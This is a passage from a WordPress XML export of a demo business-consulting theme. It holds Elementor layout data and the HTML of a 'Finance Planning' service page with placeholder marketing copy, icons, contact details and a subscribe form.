Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"cea57b4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home5.jpg","id":2373},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"0d217de","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"f15fb20","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6ba0af2","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"e0256cf","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"7264c1f","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"67b049e","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"8e459b3","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/finance-planning/</link>
		<pubDate>Tue, 22 Sep 2020 02:55:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1002</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" />											
			<h3>We Conduct Marketing Research</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation
</h6>		
					90				
			<h6>finance strategy</h6>		
		<h3>We are Always Ready to Assist Our Clients</h3><p>developing financial processes and procedures</p>		
			<h4>How It Works & How We Do It</h4>		
		<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.
									</li>
						</ul>
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home5-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />											
		<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.</p><p>Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.</p>		
			<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Contacts</h5>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg" alt="" loading="lazy" />								</a>
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1002</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:55:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:55:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2784cf1","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6b0b1f4","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6191f05","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"fa0c07e","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"508a439","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3808452","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2deb288","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"aed5597","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18feed3","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"2687052","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b9de86","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"75d682b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"eb8a5b2","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center 